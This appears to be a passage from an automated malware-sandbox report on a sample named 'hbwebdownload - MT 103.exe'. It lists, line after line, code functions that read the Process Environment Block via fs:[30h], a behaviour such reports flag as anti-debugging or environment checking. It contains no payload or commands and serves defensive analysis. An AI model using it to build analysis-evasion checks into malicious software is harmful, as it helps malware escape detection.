Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127E420 mov eax, dword ptr fs:[00000030h]	4_2_0127E420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01306420 mov eax, dword ptr fs:[00000030h]	4_2_01306420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01306420 mov eax, dword ptr fs:[00000030h]	4_2_01306420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01306420 mov eax, dword ptr fs:[00000030h]	4_2_01306420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01306420 mov eax, dword ptr fs:[00000030h]	4_2_01306420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01306420 mov eax, dword ptr fs:[00000030h]	4_2_01306420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01306420 mov eax, dword ptr fs:[00000030h]	4_2_01306420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01306420 mov eax, dword ptr fs:[00000030h]	4_2_01306420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA430 mov eax, dword ptr fs:[00000030h]	4_2_012BA430
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B8402 mov eax, dword ptr fs:[00000030h]	4_2_012B8402
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B8402 mov eax, dword ptr fs:[00000030h]	4_2_012B8402
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B8402 mov eax, dword ptr fs:[00000030h]	4_2_012B8402
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130C460 mov ecx, dword ptr fs:[00000030h]	4_2_0130C460
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AA470 mov eax, dword ptr fs:[00000030h]	4_2_012AA470
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AA470 mov eax, dword ptr fs:[00000030h]	4_2_012AA470
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AA470 mov eax, dword ptr fs:[00000030h]	4_2_012AA470
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133A456 mov eax, dword ptr fs:[00000030h]	4_2_0133A456
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE443 mov eax, dword ptr fs:[00000030h]	4_2_012BE443
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE443 mov eax, dword ptr fs:[00000030h]	4_2_012BE443
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE443 mov eax, dword ptr fs:[00000030h]	4_2_012BE443
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE443 mov eax, dword ptr fs:[00000030h]	4_2_012BE443
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE443 mov eax, dword ptr fs:[00000030h]	4_2_012BE443
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE443 mov eax, dword ptr fs:[00000030h]	4_2_012BE443
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE443 mov eax, dword ptr fs:[00000030h]	4_2_012BE443
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE443 mov eax, dword ptr fs:[00000030h]	4_2_012BE443
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A245A mov eax, dword ptr fs:[00000030h]	4_2_012A245A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127645D mov eax, dword ptr fs:[00000030h]	4_2_0127645D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130A4B0 mov eax, dword ptr fs:[00000030h]	4_2_0130A4B0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012864AB mov eax, dword ptr fs:[00000030h]	4_2_012864AB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B44B0 mov ecx, dword ptr fs:[00000030h]	4_2_012B44B0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133A49A mov eax, dword ptr fs:[00000030h]	4_2_0133A49A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012804E5 mov ecx, dword ptr fs:[00000030h]	4_2_012804E5
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BC720 mov eax, dword ptr fs:[00000030h]	4_2_012BC720
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BC720 mov eax, dword ptr fs:[00000030h]	4_2_012BC720
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B273C mov eax, dword ptr fs:[00000030h]	4_2_012B273C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B273C mov ecx, dword ptr fs:[00000030h]	4_2_012B273C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B273C mov eax, dword ptr fs:[00000030h]	4_2_012B273C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FC730 mov eax, dword ptr fs:[00000030h]	4_2_012FC730
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BC700 mov eax, dword ptr fs:[00000030h]	4_2_012BC700
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01280710 mov eax, dword ptr fs:[00000030h]	4_2_01280710
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B0710 mov eax, dword ptr fs:[00000030h]	4_2_012B0710
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01288770 mov eax, dword ptr fs:[00000030h]	4_2_01288770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770 mov eax, dword ptr fs:[00000030h]	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01304755 mov eax, dword ptr fs:[00000030h]	4_2_01304755
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B674D mov esi, dword ptr fs:[00000030h]	4_2_012B674D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B674D mov eax, dword ptr fs:[00000030h]	4_2_012B674D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B674D mov eax, dword ptr fs:[00000030h]	4_2_012B674D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130E75D mov eax, dword ptr fs:[00000030h]	4_2_0130E75D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01280750 mov eax, dword ptr fs:[00000030h]	4_2_01280750
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2750 mov eax, dword ptr fs:[00000030h]	4_2_012C2750
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2750 mov eax, dword ptr fs:[00000030h]	4_2_012C2750
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012807AF mov eax, dword ptr fs:[00000030h]	4_2_012807AF
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013347A0 mov eax, dword ptr fs:[00000030h]	4_2_013347A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132678E mov eax, dword ptr fs:[00000030h]	4_2_0132678E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A27ED mov eax, dword ptr fs:[00000030h]	4_2_012A27ED
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A27ED mov eax, dword ptr fs:[00000030h]	4_2_012A27ED
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A27ED mov eax, dword ptr fs:[00000030h]	4_2_012A27ED
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130E7E1 mov eax, dword ptr fs:[00000030h]	4_2_0130E7E1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012847FB mov eax, dword ptr fs:[00000030h]	4_2_012847FB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012847FB mov eax, dword ptr fs:[00000030h]	4_2_012847FB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128C7C0 mov eax, dword ptr fs:[00000030h]	4_2_0128C7C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013007C3 mov eax, dword ptr fs:[00000030h]	4_2_013007C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128262C mov eax, dword ptr fs:[00000030h]	4_2_0128262C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B6620 mov eax, dword ptr fs:[00000030h]	4_2_012B6620
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B8620 mov eax, dword ptr fs:[00000030h]	4_2_012B8620
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E627 mov eax, dword ptr fs:[00000030h]	4_2_0129E627
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129260B mov eax, dword ptr fs:[00000030h]	4_2_0129260B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129260B mov eax, dword ptr fs:[00000030h]	4_2_0129260B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129260B mov eax, dword ptr fs:[00000030h]	4_2_0129260B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129260B mov eax, dword ptr fs:[00000030h]	4_2_0129260B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129260B mov eax, dword ptr fs:[00000030h]	4_2_0129260B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129260B mov eax, dword ptr fs:[00000030h]	4_2_0129260B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129260B mov eax, dword ptr fs:[00000030h]	4_2_0129260B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE609 mov eax, dword ptr fs:[00000030h]	4_2_012FE609
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2619 mov eax, dword ptr fs:[00000030h]	4_2_012C2619
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA660 mov eax, dword ptr fs:[00000030h]	4_2_012BA660
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA660 mov eax, dword ptr fs:[00000030h]	4_2_012BA660
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134866E mov eax, dword ptr fs:[00000030h]	4_2_0134866E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134866E mov eax, dword ptr fs:[00000030h]	4_2_0134866E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B2674 mov eax, dword ptr fs:[00000030h]	4_2_012B2674
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129C640 mov eax, dword ptr fs:[00000030h]	4_2_0129C640
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BC6A6 mov eax, dword ptr fs:[00000030h]	4_2_012BC6A6
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B66B0 mov eax, dword ptr fs:[00000030h]	4_2_012B66B0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01284690 mov eax, dword ptr fs:[00000030h]	4_2_01284690
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01284690 mov eax, dword ptr fs:[00000030h]	4_2_01284690
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013006F1 mov eax, dword ptr fs:[00000030h]	4_2_013006F1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013006F1 mov eax, dword ptr fs:[00000030h]	4_2_013006F1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE6F2 mov eax, dword ptr fs:[00000030h]	4_2_012FE6F2
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE6F2 mov eax, dword ptr fs:[00000030h]	4_2_012FE6F2
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE6F2 mov eax, dword ptr fs:[00000030h]	4_2_012FE6F2
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE6F2 mov eax, dword ptr fs:[00000030h]	4_2_012FE6F2
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA6C7 mov ebx, dword ptr fs:[00000030h]	4_2_012BA6C7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA6C7 mov eax, dword ptr fs:[00000030h]	4_2_012BA6C7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130892A mov eax, dword ptr fs:[00000030h]	4_2_0130892A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0131892B mov eax, dword ptr fs:[00000030h]	4_2_0131892B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130C912 mov eax, dword ptr fs:[00000030h]	4_2_0130C912
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE908 mov eax, dword ptr fs:[00000030h]	4_2_012FE908
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE908 mov eax, dword ptr fs:[00000030h]	4_2_012FE908
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01278918 mov eax, dword ptr fs:[00000030h]	4_2_01278918
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01278918 mov eax, dword ptr fs:[00000030h]	4_2_01278918
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C096E mov eax, dword ptr fs:[00000030h]	4_2_012C096E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C096E mov edx, dword ptr fs:[00000030h]	4_2_012C096E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C096E mov eax, dword ptr fs:[00000030h]	4_2_012C096E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A6962 mov eax, dword ptr fs:[00000030h]	4_2_012A6962
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A6962 mov eax, dword ptr fs:[00000030h]	4_2_012A6962
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A6962 mov eax, dword ptr fs:[00000030h]	4_2_012A6962
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01324978 mov eax, dword ptr fs:[00000030h]	4_2_01324978
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01324978 mov eax, dword ptr fs:[00000030h]	4_2_01324978
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130C97C mov eax, dword ptr fs:[00000030h]	4_2_0130C97C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354940 mov eax, dword ptr fs:[00000030h]	4_2_01354940
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01300946 mov eax, dword ptr fs:[00000030h]	4_2_01300946
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013089B3 mov esi, dword ptr fs:[00000030h]	4_2_013089B3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013089B3 mov eax, dword ptr fs:[00000030h]	4_2_013089B3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013089B3 mov eax, dword ptr fs:[00000030h]	4_2_013089B3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012809AD mov eax, dword ptr fs:[00000030h]	4_2_012809AD
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012809AD mov eax, dword ptr fs:[00000030h]	4_2_012809AD
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0 mov eax, dword ptr fs:[00000030h]	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130E9E0 mov eax, dword ptr fs:[00000030h]	4_2_0130E9E0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B29F9 mov eax, dword ptr fs:[00000030h]	4_2_012B29F9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B29F9 mov eax, dword ptr fs:[00000030h]	4_2_012B29F9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134A9D3 mov eax, dword ptr fs:[00000030h]	4_2_0134A9D3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013169C0 mov eax, dword ptr fs:[00000030h]	4_2_013169C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0128A9D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0128A9D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0128A9D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0128A9D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0128A9D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0128A9D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B49D0 mov eax, dword ptr fs:[00000030h]	4_2_012B49D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132483A mov eax, dword ptr fs:[00000030h]	4_2_0132483A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132483A mov eax, dword ptr fs:[00000030h]	4_2_0132483A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA830 mov eax, dword ptr fs:[00000030h]	4_2_012BA830
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A2835 mov eax, dword ptr fs:[00000030h]	4_2_012A2835
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A2835 mov eax, dword ptr fs:[00000030h]	4_2_012A2835
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A2835 mov eax, dword ptr fs:[00000030h]	4_2_012A2835
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A2835 mov ecx, dword ptr fs:[00000030h]	4_2_012A2835
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A2835 mov eax, dword ptr fs:[00000030h]	4_2_012A2835
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A2835 mov eax, dword ptr fs:[00000030h]	4_2_012A2835
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130C810 mov eax, dword ptr fs:[00000030h]	4_2_0130C810
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01316870 mov eax, dword ptr fs:[00000030h]	4_2_01316870
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01316870 mov eax, dword ptr fs:[00000030h]	4_2_01316870
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130E872 mov eax, dword ptr fs:[00000030h]	4_2_0130E872
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130E872 mov eax, dword ptr fs:[00000030h]	4_2_0130E872
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01292840 mov ecx, dword ptr fs:[00000030h]	4_2_01292840
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01284859 mov eax, dword ptr fs:[00000030h]	4_2_01284859
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01284859 mov eax, dword ptr fs:[00000030h]	4_2_01284859
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B0854 mov eax, dword ptr fs:[00000030h]	4_2_012B0854
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130C89D mov eax, dword ptr fs:[00000030h]	4_2_0130C89D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01280887 mov eax, dword ptr fs:[00000030h]	4_2_01280887
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134A8E4 mov eax, dword ptr fs:[00000030h]	4_2_0134A8E4
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BC8F9 mov eax, dword ptr fs:[00000030h]	4_2_012BC8F9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BC8F9 mov eax, dword ptr fs:[00000030h]	4_2_012BC8F9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE8C0 mov eax, dword ptr fs:[00000030h]	4_2_012AE8C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013508C0 mov eax, dword ptr fs:[00000030h]	4_2_013508C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AEB20 mov eax, dword ptr fs:[00000030h]	4_2_012AEB20
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AEB20 mov eax, dword ptr fs:[00000030h]	4_2_012AEB20
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01348B28 mov eax, dword ptr fs:[00000030h]	4_2_01348B28
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01348B28 mov eax, dword ptr fs:[00000030h]	4_2_01348B28
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FEB1D mov eax, dword ptr fs:[00000030h]	4_2_012FEB1D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354B00 mov eax, dword ptr fs:[00000030h]	4_2_01354B00
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127CB7E mov eax, dword ptr fs:[00000030h]	4_2_0127CB7E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132EB50 mov eax, dword ptr fs:[00000030h]	4_2_0132EB50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01352B57 mov eax, dword ptr fs:[00000030h]	4_2_01352B57
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01352B57 mov eax, dword ptr fs:[00000030h]	4_2_01352B57
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01352B57 mov eax, dword ptr fs:[00000030h]	4_2_01352B57
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01352B57 mov eax, dword ptr fs:[00000030h]	4_2_01352B57
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01328B42 mov eax, dword ptr fs:[00000030h]	4_2_01328B42
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01316B40 mov eax, dword ptr fs:[00000030h]	4_2_01316B40
